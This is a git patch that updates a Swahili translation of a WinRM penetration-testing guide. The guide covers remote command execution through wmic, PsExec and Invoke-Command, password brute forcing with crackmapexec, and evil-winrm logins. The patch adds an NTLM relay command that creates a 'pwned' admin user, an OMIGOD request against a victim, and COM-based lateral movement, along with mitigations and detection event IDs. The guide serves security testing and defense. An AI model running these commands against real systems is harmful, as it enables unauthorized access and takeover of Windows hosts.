From ce924090266c881021de5a7a48d43a65ae85fcf3 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 13 Aug 2025 16:15:31 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/5985-5986-pentesting-winrm. --- .../5985-5986-pentesting-winrm.md | 94 ++++++++++++++++--- 1 file changed, 80 insertions(+), 14 deletions(-) diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index 979695f40..8cdb0f75a 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -4,25 +4,25 @@ ## WinRM -[Windows Remote Management (WinRM)]() inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inategemea WMI, ikijitokeza kama kiolesura cha HTTP kwa shughuli za WMI. +[Windows Remote Management (WinRM)]() inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inategemea WMI, ikijitambulisha kama kiolesura cha HTTP kwa shughuli za WMI. Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama ilivyo kwa SSH kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum: - **5985/tcp (HTTP)** - **5986/tcp (HTTPS)** -Bandari iliyo wazi kutoka orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali. +Bandari iliyo wazi kutoka kwenye orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali. ### **Kuanza Kikao cha WinRM** -Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za PowerShell za mbali. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika: +Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika: ```bash Enable-PSRemoting -Force Set-Item wsman:\localhost\client\trustedhosts * ``` -Njia hii inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatiwa kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji. +Njia hii inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji. -Zaidi ya hayo, WinRM inaweza ku **anzishwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa: +Zaidi ya hayo, WinRM inaweza **kuzinduliwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa: ```bash wmic /node: process call create "powershell enable-psremoting -force" ``` @@ -36,11 +36,11 @@ Ili kuthibitisha usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` inat ```bash Test-WSMan ``` -Majibu yanapaswa kuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri. +Majibu yanapaswa kuwa na taarifa kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri. ![](<../images/image (582).png>) -- Kinyume chake, kwa lengo **sio** lililowekwa kwa WinRM, hiyo itasababisha kutokuwepo kwa habari kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM. +- Kinyume chake, kwa lengo **sio** lililowekwa kwa WinRM, matokeo yatakuwa hakuna taarifa kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM. ![](<../images/image (458).png>) @@ -52,7 +52,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al ``` ![](<../images/image (151).png>) -Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya: +Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako ya ndani na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya: ```bash Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` @@ -89,7 +89,7 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New ### **Kulazimisha WinRM Kufunguliwa** -Ili kutumia PS Remoting na WinRM lakini kompyuta haijawekwa, unaweza kuikamilisha kwa: +Ili kutumia PS Remoting na WinRM lakini kompyuta haijawekwa, unaweza kuifanya iweze kwa: ```bash .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` @@ -107,7 +107,7 @@ $sess1 = New-PSSession -ComputerName [-SessionOption (New-PSSessi #And restore it at any moment doing Enter-PSSession -Session $sess1 ``` -Katika kikao hiki unaweza kupakia skripti za PS ukitumia _Invoke-Command_ +Ndani ya kikao hiki unaweza kupakia skripti za PS ukitumia _Invoke-Command_ ```bash Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` @@ -126,7 +126,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ### Brute Force -Kuwa makini, brute-forcing winrm kunaweza kuzuia watumiaji. +Kuwa makini, brute-forcing winrm inaweza kuzuia watumiaji. ```ruby #Brute force crackmapexec winrm -d -u usernames.txt -p passwords.txt @@ -142,7 +142,7 @@ crackmapexec winrm -d -u -H -X '$PSVersionT ```ruby gem install evil-winrm ``` -Soma **nyaraka** zake kwenye github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) +Soma **dokumentasiyo** kwenye github yake: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) ```ruby evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i / ``` @@ -220,11 +220,77 @@ end - `port:5985 Microsoft-HTTPAPI` -## References +--- + +## Recent Vulnerabilities & Offensive Techniques (2021-2025) + +### NTLM relay directly to WinRM (WS-MAN) +Tangu Impacket 0.11 (Mei 2023) `ntlmrelayx.py` inaweza kupeleka akreditif za NTLM zilizokamatwa moja kwa moja kwa **WS-MAN**/WinRM listener. Wakati mwenyeji bado anasikiliza kwenye **HTTP isiyo na usalama (5985)** mshambuliaji anaweza kuunganisha *mitm6* (au *Responder*) ili kulazimisha uthibitisho na kupata utekelezaji wa msimbo wa kiwango cha SYSTEM: +```bash +sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \ +--command "net user pwned P@ssw0rd! /add" +``` +Mitigations +* Zima wasikilizaji wa HTTP – `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false` +* Lazimisha HTTPS na kuwezesha Ulinzi wa Kupanuliwa kwa Uthibitishaji (EPA) kwenye toleo jipya la Windows. + +### OMIGOD – CVE-2021-38647 (Azure OMI) +Azure Linux agents hutumia huduma ya **Open Management Infrastructure (OMI)** ambayo inafichua API ya WinRM/WS-MAN kwenye porti **5985/5986**. Kosa la mantiki liliruhusu **RCE isiyo na uthibitisho kama root**: +```text +curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '' +``` +Patch auondoe OMI (toleo ≥ 1.6.8-1) na kuzuia bandari hizo kutoka kwa Mtandao. + +### WSMan.Automation COM matumizi mabaya kwa ajili ya harakati za upande +WinRM inaweza kuendeshwa bila PowerShell kupitia `WSMan.Automation` COM object – muhimu kwenye mifumo katika hali ya Lugha Iliyopangwa. Zana kama *SharpWSManWinRM* zinafunga mbinu hii: +```powershell +$ws = New-Object -ComObject 'WSMan.Automation' +$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null) +$cmdId = $session.Command('cmd.exe',@('/c','whoami')) +$session.Signal($cmdId,0) +``` +Mnyororo wa utekelezaji (`svchost → wmiprvse → cmd.exe`) ni sawa na PS-Remoting ya jadi. + +--- + +## Sasisho za Zana + +* **Evil-WinRM v3.x (2024)** – sasa inasaidia **Kerberos** (`-k` / `--spn`) na uthibitishaji wa **cheti** (`--cert-pem`/`--key-pem`), usajili wa kikao (`-L`) na uwezo wa kuzima ukamilishaji wa njia ya mbali (`-N`). + +```bash +RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST +``` + +* **Python – `pypsrp` 0.9 (2024)** inatoa WinRM & PS-Remoting kutoka Linux, ikiwa ni pamoja na CredSSP na Kerberos: + +```python +from psrp.client import Client +c = Client('srv01', username='ACME\\j.doe', ssl=True) +print(c.execute_cmd('ipconfig /all').std_out.decode()) +``` + +* **Ugunduzi** – fuatilia kumbukumbu ya **Microsoft-Windows-WinRM/Operational**: +* Tukio 91 / 163 – shell imeundwa +* Tukio 182 – kushindwa kwa uthibitishaji +* Katika kumbukumbu ya Usalama tukio 4262 linaandika IP ya chanzo (imeongezwa Julai 2022 CUs). +Kusanya hizi kwa kati na kutoa tahadhari kuhusu IP zisizo na jina au za nje. + +--- + +## Shodan + +- `port:5985 Microsoft-HTTPAPI` + +## Marejeleo + +- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) +- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/) +- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure) + - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) -## HackTricks Automatic Commands +## HackTricks Amri za Otomatiki ``` Protocol_Name: WinRM #Protocol Abbreviation if there is one. Port_Number: 5985 #Comma separated if there is more than one.